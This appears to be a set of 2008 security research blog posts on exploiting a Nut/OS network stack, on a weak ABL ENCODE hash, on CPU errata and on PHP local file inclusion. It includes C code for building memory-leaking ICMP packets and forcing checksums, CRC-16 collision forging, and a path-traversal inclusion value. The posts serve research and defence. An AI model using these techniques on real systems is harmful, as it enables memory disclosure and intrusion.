Exploiting Embedded Devices (Part 1)

November 17, 2008

Recently we have been assessing an increasing number of embedded devices. Because the methods for carrying out this type of assessment are not well defined, I am starting a series of posts discussing vulnerabilities and exploitation on embedded platforms.

In recent years the exploitation of common vulnerability classes on the most popular platforms has become increasingly difficult. Although vulnerabilities are still common, especially in client-side applications, exploiting them often becomes a complex matter of bypassing multiple protection mechanisms, including stack cookies, heap verification, and data execution prevention. However, with the move towards miniaturization, products are increasingly giving up these protections and moving to largely untested platforms. Often the base libraries and operating systems chosen for these devices contain trivially exploitable vulnerabilities.

Several months ago I assessed a product which included a networked device based on Nut/OS. This minimal operating system describes itself as follows:

Nut/OS is an intentionally simple RTOS for the ATmega128, which provides a minimum of services to run Nut/Net, the TCP/IP stack. Its features include:
+  Non preemptive multithreading.
+  Events.
+  Periodic and one-shot timers.
+  Dynamic heap memory allocation.
+  Interrupt driven streaming I/O.

Main features of the TCP/IP stack are:
+  Base protocols ARP, IP, ICMP, UDP and TCP.
+  User protocols DHCP, DNS and HTTP.
+  Socket API.
+  Host, net and default routing.
+  Interrupt driven Ethernet driver.

While assessing the device, I found that one of the most exposed components was the network stack, so some discussion of this minimal operating system's network stack is in order. The vulnerability I will discuss has now been patched, but the vulnerable version of the operating system can be downloaded here. An incoming IP packet is passed from the device driver into NutEtherInput() and on into NutIpInput(), where it is demultiplexed by protocol and passed to the appropriate component. Within NutIpInput(), on line 187 of net/ipin.c, the length of the IP header is calculated and then used after being checked only against the minimum header size, never against the length of the packet. The IP header length field is a 4-bit count of 32-bit words, so it is multiplied by 4 to obtain the length in bytes. Later, on lines 250, 251, and 252, several lengths are calculated from this value and from the equally unchecked total length of the packet. This leads to a number of interesting conditions throughout the network stack, where pointers to protocol headers and data are calculated from incorrect IP header lengths.

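void NutIpInput(NUTDEVICE * dev, NETBUF * nb)
{
    /* ... */

    /* ip_hl counts 32-bit words; only a lower bound is enforced here. */
    ip_hdrlen = ip->ip_hl * 4;
    if (ip_hdrlen < sizeof(IPHDR)) {
        NutNetBufFree(nb);
        return;
    }

    /* ... */

    /* Neither ip_hdrlen nor ip_len is checked against the bytes received. */
    nb->nb_nw.sz = ip_hdrlen;
    nb->nb_tp.vp = ((char *) ip) + (ip_hdrlen);
    nb->nb_tp.sz = htons(ip->ip_len) - (ip_hdrlen);

    /* ... */
}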
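
The excerpt enforces only a lower bound on the header length. The checks it is missing can be sketched as follows, operating on a raw IPv4 header in a byte buffer rather than on Nut/OS's NETBUF structures. The function ip_lengths_sane and its parameters are hypothetical; this illustrates the missing sanity checks and is not the patch Nut/OS actually shipped.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define IP_MIN_HDR_LEN 20u   /* 5 words of 32 bits */

/*
 * Hypothetical check (not the actual Nut/OS fix): accept the IPv4 packet in
 * pkt[0..rx_len) only if its header-length and total-length fields are
 * consistent with the number of bytes the driver actually received.
 */
static int ip_lengths_sane(const uint8_t *pkt, size_t rx_len)
{
    if (rx_len < IP_MIN_HDR_LEN)
        return 0;
    size_t hdrlen = (size_t)(pkt[0] & 0x0f) * 4;   /* ip_hl: 32-bit words -> bytes */
    size_t total = ((size_t)pkt[2] << 8) | pkt[3];  /* ip_len, network byte order */

    if (hdrlen < IP_MIN_HDR_LEN)   /* the only check present in the excerpt */
        return 0;
    if (total < hdrlen)            /* header would extend past the datagram */
        return 0;
    if (total > rx_len)            /* datagram claims more bytes than were received */
        return 0;
    return 1;
}
```

For example, a 28-byte packet whose first byte is 0x4f (ip_hl = 15, a 60-byte header) is rejected because its header would extend past the datagram. The last check also rejects an ip_len larger than the data received, which is the condition behind the memory disclosure discussed later in this post.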

The most interesting of these conditions, from the perspective of exploitation, are, strangely, in one of the simplest protocol handlers: ICMP. This arises largely because the buffers allocated for incoming echo requests are reused for the responses. The responses are sent through NutIcmpOutput() in net/icmpout.c. To exploit this we need data to be written to a pointer that can be pushed forward into another chunk of heap memory by specifying an incorrect IP header length. Only two writes meet these criteria. The first is the type field of the ICMP packet, which for an echo reply will always be zero. Although it may be possible in some cases to gain execution with the ability to overwrite heap memory with a null byte, here there is a more interesting alternative. The second field written is a checksum of the ICMP portion of the packet, which is data we at least partly control. So, by specifying an IP header length larger than the true length (typically 5 words) and controlling the calculated checksum, we can write an arbitrary 2 bytes to any 32-bit boundary within 9 words of the end of our packet in memory: the largest IP header length (15 words) minus the smallest real IP header (5 words) and the one-word ICMP type, code, and checksum fields.

int NutIcmpOutput(uint8_t type, uint32_t dest, NETBUF * nb)
{
    ICMPHDR *icp;
    uint16_t csum;

    /* nb_tp.vp was derived from the unchecked ip_hl in NutIpInput(). */
    icp = (ICMPHDR *) nb->nb_tp.vp;
    icp->icmp_type = type;                  /* write 1: type byte (0 for an echo reply) */
    icp->icmp_cksum = 0;
    csum = NutIpChkSumPartial(0, nb->nb_tp.vp, nb->nb_tp.sz);
    icp->icmp_cksum = NutIpChkSum(csum, nb->nb_ap.vp, nb->nb_ap.sz);  /* write 2: checksum */
    return NutIpOutput(IPPROTO_ICMP, dest, nb);
}
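
Controlling the second write comes down to ones'-complement arithmetic: because the Internet checksum is a sum, changing one 16-bit word of attacker-controlled data shifts the result by a predictable amount. The sketch below assumes the standard RFC 1071 checksum computed over one contiguous buffer and a 16-bit-aligned word the attacker can choose; ones_sum, inet_cksum and force_cksum are hypothetical helpers, not Nut/OS functions, and the byte order in which the result finally lands in memory depends on how Nut/OS stores it.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* RFC 1071 ones'-complement sum of big-endian 16-bit words, folded to 16 bits. */
static uint16_t ones_sum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)buf[i] << 8) | buf[i + 1];
    if (len & 1)
        sum += (uint32_t)buf[len - 1] << 8;      /* pad an odd trailing byte with zero */
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);      /* end-around carry */
    return (uint16_t)sum;
}

/* The value stored in a checksum field: complement of the folded sum. */
static uint16_t inet_cksum(const uint8_t *buf, size_t len)
{
    return (uint16_t)~ones_sum(buf, len);
}

/*
 * Hypothetical helper: choose the 16-bit word at even offset `pos` so that
 * inet_cksum(buf, len) == target. Any target except 0xffff is reachable.
 */
static void force_cksum(uint8_t *buf, size_t len, size_t pos, uint16_t target)
{
    assert(pos % 2 == 0 && pos + 1 < len && target != 0xffff);
    buf[pos] = buf[pos + 1] = 0;
    uint32_t s0 = ones_sum(buf, len) % 0xffff;   /* other words, mod 2^16 - 1 */
    uint32_t want = (uint16_t)~target;           /* required folded sum, 1..0xffff */
    uint32_t w = (want + 0xffff - s0) % 0xffff;
    if (w == 0)
        w = 0xffff;                              /* ones'-complement "negative zero" */
    buf[pos] = (uint8_t)(w >> 8);
    buf[pos + 1] = (uint8_t)w;
}
```

force_cksum(buf, len, 12, 0x4142) rewrites bytes 12 and 13 so that inet_cksum(buf, len) returns 0x4142. The only value it cannot produce is 0xffff, because the ones'-complement sum of data containing a nonzero word is never zero.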

This leads us to another difficulty: the Nut/OS heap implementation (specifically its use of singly linked lists). I will go into this in more detail in another post, but for now I want to talk about another vector for exploiting this vulnerability. In many cases the rather limited memory of an embedded device contains information that would be useful to an attacker. Things like encryption keys and passwords are all stored in the same address space the network stack operates in. If you have been following along, you may see where I am going with this. When we specify a packet length (not ip->ip_hl but ip->ip_len) in the IP header of an ICMP echo request that is larger than the packet actually sent, the excess length of the echo response is pulled from the memory directly after the allocated buffer. By sending an ICMP echo request with no data and a long length, we can effectively read chunks of memory from the vulnerable device. To leak as much memory as possible, an attacker can use particulars of the TCP stack to force allocations and deallocations and thereby change where the packet buffer is allocated.
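
The shape of such a request can be sketched as a raw 28-byte packet: a 20-byte IPv4 header whose total-length field claims more than is sent, followed by an 8-byte ICMP echo request header with no data. The helper names and the TTL, identifier and sequence values are arbitrary choices for illustration, and actually sending the packet (for example over a raw socket) is left out. Whether a particular Nut/OS build verifies the ICMP checksum over the claimed length is not covered here, so the sketch checksums only the 8 bytes actually sent.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* RFC 1071 Internet checksum over big-endian 16-bit words. */
static uint16_t inet_cksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)buf[i] << 8) | buf[i + 1];
    if (len & 1)
        sum += (uint32_t)buf[len - 1] << 8;
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }

#define PROBE_LEN 28   /* 20-byte IPv4 header + 8-byte ICMP echo header, no data */

/* Hypothetical helper: echo request with no payload whose ip_len claims claimed_len. */
static void build_leak_probe(uint8_t out[PROBE_LEN], uint32_t src, uint32_t dst,
                             uint16_t claimed_len)
{
    memset(out, 0, PROBE_LEN);
    out[0] = 0x45;                         /* version 4, ip_hl = 5 words */
    put16(out + 2, claimed_len);           /* ip_len: larger than what is sent */
    out[8] = 64;                           /* TTL */
    out[9] = 1;                            /* protocol: ICMP */
    put32(out + 12, src);                  /* addresses given in host order */
    put32(out + 16, dst);
    put16(out + 10, inet_cksum(out, 20));  /* IP header checksum */

    uint8_t *icmp = out + 20;
    icmp[0] = 8;                           /* type: echo request */
    put16(icmp + 4, 0x1234);               /* identifier (arbitrary) */
    put16(icmp + 6, 1);                    /* sequence number */
    put16(icmp + 2, inet_cksum(icmp, 8));  /* checksum over the 8 bytes sent */
}
```

With claimed_len set to 1000, a vulnerable stack would take up to 972 bytes of its echo reply from memory beyond the 28 bytes actually received.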

Visualizing the attack with ninjas

By manipulating the heap, it is possible to rebuild large sections of the vulnerable device's memory from the data segments of the returned ICMP responses. In many cases this will give the attacker everything they need to further compromise the system. Even when no critical encryption key or password can be leaked from memory, this attack is extremely useful in facilitating a more typical heap corruption exploit.

I want to touch briefly on the steps device manufacturers can take to avoid this type of vulnerability. It is not sufficient to assume that a device will not be attacked because it is embedded. As deploying this type of system on the internet grows in popularity, greater numbers of attackers will focus on these platforms simply because exploitation is often easier. When deploying internet-enabled devices, the same precautions should be taken as with more conventional platforms like Windows and Linux. During the design process, base libraries and operating systems should be vetted through security review before they are included in a product. I expect to see much more research into these platforms as Ethernet adapters and wireless interfaces are added to more and more devices.


Crypto Pet Peeves: Hashing…Encoding…It’s All The Same, Right?

August 25, 2008

Patrick Toomey

© 2008 Neohapsis

We all know cryptography is hard. Time and time again we in the security community give advice that goes something like, “Unless you have an unbelievably good reason for developing your own cryptography, don’t!” Even if you think you have an unbelievably good reason, I would still pause and make sure there is no alternative. Nearly every aspect of cryptography is painstakingly difficult: developing new crypto primitives is hard, correctly implementing them is nearly as hard, and even using existing crypto APIs can be fraught with subtlety. As discussed in a prior post, Seed Racing, even fairly simple random number generation is prone to developer error. Whenever I audit source, I keep my eyes open for unfamiliar crypto code. Such was the case on a recent engagement, where I found myself reviewing an application in a language I was less familiar with: Progress ABL.

Progress ABL is similar to a number of other 4GL languages, simplifying development given the proper problem set. Most notably, Progress ABL allows for rapid development of typical business CRUD applications, as the language has a number of features that make database interactions fairly transparent. For those of you interested in learning more, the language reference manual can be found on Progress’ website.

As I began my review of the application, I found myself starting where I usually do: staring at the login page. The application was a fairly standard web app that required authentication with login credentials before granting access to its sensitive components. Being relatively unfamiliar with ABL, I was curious how it would handle session management. Sure enough, just as with many other web apps, the application set a secure cookie upon login that uniquely identified my session. However, I noticed that the session ID was relatively short (sixteen upper/lower case letters followed by four digits). I decided to pull down a few thousand tokens to see if I noticed any anomalies. The first thing I noticed was that the four-digit number on the end was obviously not random, as values tended to repeat, cluster together, etc. So, the security of the session ID must lie in the sixteen characters that precede the four digits. However, even the sixteen characters did not look so random. Certain letters appeared more often than others, and certain characters seemed to follow particular characters more often than others. But this was totally unscientific; strange patterns can be found in any small sample of data. So, I decided to do a more scientific investigation into what was going on.

Just to confirm my suspicions, I coded up a quick Python script to pull down a few thousand tokens and count the frequency of each character in them. Several minutes later I had a nice graph in Excel.
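
The post did this with a Python script and Excel; the counting itself is simple enough to sketch in C. The chi-squared statistic is an addition the original analysis did not use, included only to put a rough number on "doesn't look very random". The function names are hypothetical, and for these tokens the alphabet would be the 52 upper- and lower-case letters.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Count how often each byte value appears across all tokens. */
static void char_histogram(const char *const *tokens, size_t n,
                           unsigned long counts[256])
{
    memset(counts, 0, 256 * sizeof counts[0]);
    for (size_t i = 0; i < n; i++)
        for (const unsigned char *p = (const unsigned char *)tokens[i]; *p; p++)
            counts[*p]++;
}

/*
 * Pearson chi-squared statistic of the counts for the characters in
 * `alphabet` against a uniform distribution over that alphabet.
 * Values far above (alphabet size - 1) suggest the characters are not uniform.
 */
static double chi_square_uniform(const unsigned long counts[256], const char *alphabet)
{
    size_t k = strlen(alphabet);
    unsigned long total = 0;
    for (size_t i = 0; i < k; i++)
        total += counts[(unsigned char)alphabet[i]];
    if (k == 0 || total == 0)
        return 0.0;

    double expected = (double)total / (double)k;
    double chi2 = 0.0;
    for (size_t i = 0; i < k; i++) {
        double d = (double)counts[(unsigned char)alphabet[i]] - expected;
        chi2 += d * d / expected;
    }
    return chi2;
}
```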

Histogram of Encode Character Frequency

Ouch! That sure doesn’t look very random. So, I opened up Burp Proxy and used its Sequencer to pull down a few thousand more session cookies. The Burp Sequencer can run a number of tests, including a set of FIPS-compliant statistical tests for randomness. To obtain a statistically significant result, Burp analyzes a sample of 20,000 tokens. Since I saw that the four-digit number at the end of the session ID provided little to no entropy, I discarded it from the analysis. It seemed obvious that the sixteen-character sequence was generated using some sort of cryptographic hash and the four-digit number was generated in some other way, and I was more interested in the entropy provided by the hash. So, after twenty minutes of downloading tokens, I let Burp crunch the numbers. About 25 seconds later Burp returned an entropy estimate of 0 bits, along with a graph like the one below showing the estimated entropy of the data at various significance levels.

Encode Entropy Estimation

Hmmm, maybe Burp is broken. I was pretty sure I had successfully used the Burp Sequencer before, but maybe it was user error, a bug in the current version, who knows. I decided that a control was needed, just to ensure that the tool was working the way I thought it should. So, I wrote a bit more Python to print the hex-encoded SHA1 hash of each of the numbers 1-20,000. I loaded this data into Burp and analyzed it. Burp estimated the entropy at 153 bits. For comparison with the prior results, here are the distribution graph and the Burp entropy results for the SHA1 output:

Histogram of SHA1 Character Frequency

SHA1 Entropy Estimation

I repeated the same test against a set of JSESSIONID tokens and found a similarly acceptable result. Ok, so the Burp Sequencer seems to be working.

Next, I went hunting for the session token generation code in the application. After a little grepping I found the function that generates new session tokens. Ultimately it took a number of values and ran them through a function called “ENCODE”. Hmmm, ENCODE; that didn’t sound familiar. Some more grepping through the source did not reveal a function definition, so I assumed the function must be part of the ABL standard library. Sure enough, page 480 of the language reference manual describes the ENCODE function:

“Encodes a source character string and returns the encoded character string result”

The documentation then goes on to state:

“The ENCODE function performs a one-way encoding operation that you cannot reverse.  It is useful for storing scrambled copies of passwords in a database. It is impossible to determine the original password by examining the database. However, a procedure can prompt a user for a password, encode it, and compare the result with the stored, encoded password to determine if the user supplied the correct password.”

That is the least committal description of a hash function I’ve ever had the pleasure of reading. It turns out the application, as well as a third-party library the application depends upon, uses this function for generating session tokens, storing passwords, and generating encryption keys. For the sake of reproducibility, I wanted to be sure my data was not the result of some strange artifact in their environment. I installed the ABL runtime locally and coded up a simple ABL script to call ENCODE on the numbers 1-20,000. I reran the Burp Sequencer and got exactly the same result: 0 bits.

At this point I was fairly sure that ENCODE was flawed from a hashing perspective. A good-quality secure hash function, regardless of how correlated its inputs are (as the numbers 1-20,000 obviously would be), should produce output that is indistinguishable from truly random values (see Cryptographic Hash Functions and Random Oracle Model for more information). ENCODE clearly does not meet this definition of a secure hash function. But 0 bits seems almost inconceivably flawed. So, giving them the benefit of the doubt, I wondered whether the result depended on the input. In other words, I conjectured that ENCODE might perform some unsophisticated “scrambling” operation on the input, so that input with low entropy would have low entropy on output. Conversely, input with high entropy might retain its entropy on output. This still wouldn’t excuse the final result, but I was curious nonetheless. My final test was to take my SHA1 results and feed each of them through the ENCODE function. Since the output of SHA1 contains high entropy, I conjectured that ENCODE, despite its obvious flaws, might retain this entropy. The results are shown below:

Histogram of SHA1 then Encode Character Frequency

SHA1 then Encode Entropy Estimation

ENCODE manages to transform an input with approximately 160 bits of entropy into an output that, statistically speaking, contains 0 bits of entropy. In fact, the frequency distribution of the character output is nearly identical to the first graph in this post.

This brings me back to my opening statement, “Unless you have an unbelievably good reason for developing your own cryptography, don’t!” I can’t figure out why this ENCODE function exists. Surely the ABL library has support for a proper hash function like SHA1, right? Yes, in fact it does. The best explanation I could come up with is that ENCODE is a legacy API call. If that is the case, the call should be deprecated and/or documented as suitable only in cases where security is of no importance. The current API documentation does the exact opposite, encouraging developers to use the function for storing passwords. Cryptography is hard, even for those of us who understand the subtleties involved. Anything that blurs the line between safe and unsafe behavior only makes the burden on developers even greater.

It is unclear, based on this analysis, how much effort it would take to find collisions in ABL’s ENCODE function. But even this simple statistical analysis should be enough for anyone to steer clear of it for anything security related. If you are an ABL developer, I would recommend replacing ENCODE with something else. As a trivial example, you could try HEX-ENCODE(SHA1-DIGEST(input)). Obviously you need to test and refactor any code that this breaks, but you can at least be assured that SHA1 is relatively secure from a hashing perspective. That said, you might want to start looking at SHA-256 or SHA-512, given the recent chinks in the armor of SHA1.

Unfortunately, it does not appear that ABL has support for these more contemporary SHA functions in their current release.

Ok… slowly stepping down off my soapbox now. Bad crypto just happens to be one of my pet peeves.

Footnote:

Just before posting this blog entry, I decided to email Progress to see if they were aware of the behavior of the ENCODE function. After a few back-and-forth emails, I eventually received one that described the ENCODE function as using a CRC-16 to generate its output (it is not the direct output, but CRC-16 is the basic primitive used to derive the output). Unfortunately, CRCs were never meant to have any security guarantees. CRCs do an excellent job of detecting accidental bit errors in a noisy transmission medium. However, they provide no guarantees if a malicious user tries to find a collision. In fact, maliciously generating inputs that produce identical CRC outputs is fairly trivial. As an example, the linearity of the CRC-32 algorithm was noted as problematic in an analysis of WEP. Thus, despite the API documentation’s recommendation, I would highly recommend that you not use ENCODE as a means of securely storing your users’ passwords.
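
The linearity mentioned above is easy to demonstrate. The sketch below uses CRC-16/ARC (polynomial 0x8005, reflected, initial value 0, no final XOR) purely as an assumed example: Progress did not say which CRC-16 variant or derivation ENCODE uses, so this is not a model of ENCODE itself. It shows that XOR-ing two equal-length messages XORs their CRCs, and that with only 65,536 possible outputs, a message matching any chosen CRC can be found by brute force over two bytes. crc16_arc and forge_crc16 are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* CRC-16/ARC: reflected polynomial 0x8005 (0xA001), init 0, no final XOR. */
static uint16_t crc16_arc(const uint8_t *p, size_t n)
{
    uint16_t crc = 0;
    while (n--) {
        crc ^= *p++;
        for (int k = 0; k < 8; k++)
            crc = (crc & 1) ? (uint16_t)((crc >> 1) ^ 0xA001) : (uint16_t)(crc >> 1);
    }
    return crc;
}

/*
 * Overwrite the last two bytes of buf (len >= 2) so that its CRC equals
 * target. Sixteen free trailing bits can reach every CRC-16 value, so the
 * exhaustive search over 2^16 candidates always succeeds.
 */
static int forge_crc16(uint8_t *buf, size_t len, uint16_t target)
{
    for (uint32_t s = 0; s <= 0xffff; s++) {
        buf[len - 2] = (uint8_t)(s >> 8);
        buf[len - 1] = (uint8_t)s;
        if (crc16_arc(buf, len) == target)
            return 1;
    }
    return 0;
}
```

For example, forging the last two bytes of an arbitrary 8-byte buffer so that its CRC matches that of "secret" takes at most 65,536 cheap iterations, which is exactly the kind of collision a password store must not allow.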


16-bit debugger goodness

August 2, 2008

It’s Saturday around noon. A friend is building a new server and wants to add 8 gigs of RAM to his MSI motherboard, but first he needs to flash the motherboard. I’m bored, it seems easy, and he hasn’t seen Afro Samurai, so I figure we’ll upgrade his motherboard, watch some anime, and call it a Saturday afternoon well spent.

Well, it turns out the instructions say to use a floppy… guess what? He has no floppy drives. He has ten computers, counting the laptop I brought, but no floppy drives. Ah ok, well, this is for a Linux server, but we supposedly need Windows to install. He installed Windows before I got there, but no go: the software won’t run, and without a floppy drive we can’t make a DOS floppy. Believe it or not, I keep a small win98boot.img file on my server for just such an occasion, but without a floppy drive I’ve got nothing.

So I go back to my house, where I have tons of computers, all with floppies. Now that I think about it, I have no idea why I always add a floppy when I build a machine… but I do. Plus I have extra drives, so I grab one and some blank disks. Hey, I still have blanks from the days of Slackware boot floppies and Novell server.exes… yeah, you remember ;)

So get this: the motherboard doesn’t boot with the floppy attached. Whatever. We figure it should be trivial to modify the installer to use another drive letter rather than A:. We divide our efforts: he goes to task making a USB DOS-bootable thumbdrive, and I go to modify the motherboard’s installer.

As you can probably guess from this post, it was a 16-bit installer. No problem, right? I do 32-bit in Olly and IDA, so trivial, eh? Nope, only IDA can open such a thing, and it can’t debug it. That wouldn’t be a big deal, except the binary is packed. Packed! Yeah, for real, 16-bit and packed.

At this stage there is no turning back for me. Meanwhile he already has his thumbdrive in DOS mode. But I can’t debug 16-bit code, even in IDA. Huh, who knew? Well, probably a lot of you, but I didn’t. So I figure, well, I’ll start up debug.exe and do it from there… nope. No breakpoint support or anything useful. Hmmmm. Then I stumble on GRDB. It stands for ‘Get Real’ Debugger, and I have to say I was impressed. It can handle 16-bit apps and also has 32-bit functionality. It actually has a lot of cool features, like PCI bus support, but I didn’t need that. What it did have was breakpoints, single stepping, and step-over commands. Plus, in comments it would show whether a jump was taken or the contents of ES:[ax+dx]. GRDB, I love you! :) And just for icing on the cake, it has ANSI colors. Now how can you not love that?

GRDB comes with source: all in ASM, and it can be compiled with MASM. All code is licensed under the GPL as well! Woot! By now my friend has already updated his motherboard and is installing Linux, but I’m still in fascinated mode. I missed the RE scene back in the 16-bit DOS days. Granted, I used debug.exe to change binaries, but only at offsets other people had told me about. I was not in the scene that set the precedent for today’s debuggers. Now if only I could modify the binary to support Ruby and a .gdbinit script… ;)

But if you are stuck with a 16-bit app, I recommend GRDB. Or, if you want to write a packer that modern debuggers choke on… go old school. (PS. I laughed when I unpacked it and fired up ImpRec just to see that NTVDM.EXE was all that was running :P) I forget how spoiled I am nowadays, but this Saturday afternoon I found a surprisingly useful gem.

–Craig


Exploiting Erroneous Errata

August 1, 2008

Recently I was reading through the line-up for the Hack in the Box Conference, which will be held in Malaysia this October. The following talk made my ears perk up: “Remote Code Execution Through Intel CPU Bugs” by Kris Kaspersky. Briefly, this talk will cover the exploitation of Intel processor errata. Yes, you heard that right: Kris has managed to exploit hardware bugs. He goes on to say that they have developed PoC code that allows remote exploitation of at least one of these bugs.

When I first came across this, I was impressed, to say the least. I decided to re-read the Intel errata to see if I could spot the exploitable conditions. There was some discussion when these were first released, including speculation about the exploitability of several of them, but like most people I didn’t think much of it (OS developers flip out all the time).

After reading through the Intel Core 2 documents I decided to check out the revisions for the Athlon 64 as well. That’s where I ran across this gem:

Errata 95: “RET Instruction May Return To Incorrect EIP”

Speaking of exploitability… let’s see what causes this.

In order to efficiently predict return addresses, the processor implements a 12-deep return address stack to pair RETs with previous CALLs.

Under the following unusual and specific conditions, an overflowed hardware return stack may cause a RET instruction to return to an incorrect EIP in 64-bit systems running 32-bit compatibility mode applications:

• A CALL near is executed in 32-bit compatibility mode.
• Prior to a return from the called procedure, the processor is switched to 64-bit mode.
• In 64-bit mode, subsequent CALLs are nested 12 levels deep or greater.
• The lower 32 bits of the 64-bit return address for the 12th-most deeply nested CALL in 64-bit mode matches exactly the 32-bit return address of the original 32-bit mode CALL.
• A series of RETs is executed from the nested 64-bit procedures.
• The processor returns to 32-bit compatibility mode.
• A RET is executed from the originally called procedure.

So let’s assume you have a 32-bit application running in compatibility mode that you would like to exploit, and you can force a somewhat long function to be called repeatedly. You could create a 64-bit thread with a very tight function that recursively calls itself 12 times and returns to an address that matches (in its lower 32 bits) the return address of the function you are targeting. This would create a bit of a race, but it would be very winnable given a slightly complex target and a tight exploit loop.

Of course, the erratum doesn’t detail what the incorrect return address might be, but assuming it can somehow be predicted or controlled, this could be a fun little bug. This specific bug only exists on a small subset of AMD hardware, specifically CPUIDs 0xF51, 0xF58, and 0xF48. If anyone has a processor with the bug and would like to experiment with it, I would love to hear from you.


Local File Inclusion – Tricks of the Trade

July 21, 2008

By: Cris Neckar, Andrew Case

Everyone understands that local file includes are bad. The ability to execute an arbitrary file as code is unquestionably a security risk and should be protected against. However, the process of exploitation can be rather involved and is commonly misunderstood. In this post I want to clarify the risks involved in this type of vulnerability and the complications involved in exploitation.

To start, let’s give a bit of background. I will focus on PHP on Linux specifically, but this class of vulnerability may also exist in many other interpreted languages on different platforms. Generically, a file inclusion vulnerability is the dynamic execution of interpreted code loaded from a file. This file could be loaded remotely from an HTTP/FTP server in the case of remote inclusions, or, as I will cover, locally from disk. Remote file inclusion vulnerabilities are generally trivial to exploit, so I will not be covering them. The following line is an example of a local file inclusion vulnerability in PHP:

require_once($LANG_PATH . '/' . $_GET['lang'] . '.php');

In this case an attacker controls the “lang” variable and can thereby force the application to execute an arbitrary file as code. The attacker does not, however, control the beginning of the require_once() argument, so including a remote file would not be possible. To exploit this, an attacker would set the ‘lang’ variable to a value similar to the following, where the trailing URL-encoded null byte (%00) truncates the ‘.php’ suffix the application appends (this works on PHP versions that do not reject null bytes in file paths):

lang=../../../../../../file/for/inclusion%00

Before we get into discussing the exploitation of this type of vulnerability let me say a few words about preventing them. In the preceding case, the vulnerability could be trivially mitigated through input validation. A simple check for non-alphanumeric characters would suffice in this case. However, where possible I would recommend completely avoiding user input for this type of logic and instead selecting the proper include from a hardcoded list of known good files based on a user supplied index number or hash.
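
Both suggestions can be sketched in a few lines. The C below is illustrative only (the vulnerable code is PHP), and LANG_FILES, lang_is_alnum and lang_file_for_index are hypothetical names. Note that isalnum() is locale-dependent, so the check assumes the default "C" locale.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/* Hypothetical hardcoded list of language files the application ships with. */
static const char *const LANG_FILES[] = { "en.php", "de.php", "fr.php" };

/* Option 1: reject any non-empty lang value that is not purely [A-Za-z0-9]. */
static int lang_is_alnum(const char *s)
{
    if (*s == '\0')
        return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s))
            return 0;
    return 1;
}

/* Option 2 (preferred): map a user-supplied index onto the fixed list. */
static const char *lang_file_for_index(long idx)
{
    size_t n = sizeof LANG_FILES / sizeof LANG_FILES[0];
    return (idx >= 0 && (size_t)idx < n) ? LANG_FILES[idx] : NULL;
}
```

With the second approach, user input never becomes part of a path at all: an out-of-range index simply yields NULL, which the caller can treat as "use the default language".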

Now that we know how to avoid these when developing applications, let’s get back to methods of exploitation. A straightforward vulnerability such as this one can in fact be quite difficult to exploit reliably, given the differences between deployment platforms. When developing an exploit, the first question to ask yourself is generally “What do I need for successful exploitation?” In this case, the answer is a file stored locally on the target system that contains PHP code accomplishing our goal. In the best case, we will be able to include a file whose contents we directly control.

This can be an interesting puzzle, as it is almost a chicken-and-egg problem: to gain access to the remote system, we need the ability to create a file on the remote system. The first possibility, and by far the simplest, is to look at the features provided by the application we are attacking. For example, many local inclusion exploits use features such as custom avatars and file storage mechanisms to place code on the target system. Bypassing the various checks performed on these types of files and images can be an interesting puzzle in itself, and the details are best saved for a future post. Here, however, we want to talk about these vulnerabilities on systems that do not allow such trivial exploitation.

If the target application does not provide some way of uploading or changing a file on disk, we need to examine other options. I suggest examining all access to the target server. Ask yourself, “What services are available to me, and what files do they access? Do I control any of the data written to these files?” An anonymous FTP server or similar would certainly make life easier here, but that would be too good to be true. :)

Generally when people discuss local includes, the assumption is that the target file will be the HTTP server’s logs. It is quite easy to influence the contents of log files, as their purpose is to store the requests that you, the user, make. Most people will suggest the logs and conveniently gloss over the complexities their use presents. There are several major potential hurdles in using logs.

First we run into the problem of finding the logs. In a production environment it is rare to use default paths for log data. ‘/var/log/httpd/access_log’ is simple enough to guess, but what do you do when the log is stored in ‘/vol001/appname.ourwidget.com/log’? Guessing this path would be non-trivial at best, and even if verbose error messages or a similar information disclosure gives you some hint of the directory structure, using these methods in a reliable exploit would be extremely difficult.

To jump this hurdle, let’s examine an interesting feature of the Linux proc filesystem, namely the ‘self’ link. The Linux kernel exports a good bit of interesting information about individual processes to user mode through the proc entries for each process ID. It also creates an entry called ‘self’, which gives a process easy access to its own process information. When we access /proc/self through the context of a PHP include, the link will, in most cases, point to the process entry for the httpd child that has instantiated the PHP interpreter library (this may not be the case if the interpreter has been invoked as CGI). Often when an HTTPd is run, the path to its configuration file is passed as an argument. If this is the case, finding the log file is a simple matter of including ‘/proc/self/cmdline’, reading the location of the configuration file, and including that file to find the path to the log files.
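
Because /proc/self resolves to whichever process opens it, a program can read its own command line the same way. The Linux-only sketch below (dump_cmdline is a hypothetical name) reads /proc/self/cmdline and splits it on the NUL bytes that terminate each argument; those invisible separators are typically why an included copy of this file shows the arguments run together.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Print the arguments of the current process, read from the Linux-specific
 * /proc/self/cmdline file, where each argument ends with a NUL byte.
 * Returns the number of arguments printed, or -1 if the file can't be read.
 */
static int dump_cmdline(FILE *out)
{
    char buf[4096];
    FILE *f = fopen("/proc/self/cmdline", "rb");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';                    /* guard against a truncated last argument */

    int count = 0;
    for (size_t i = 0; i < n; i += strlen(buf + i) + 1)
        fprintf(out, "argv[%d] = %s\n", count++, buf + i);
    return count;
}
```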

Viewing the apache cmdline proc entry

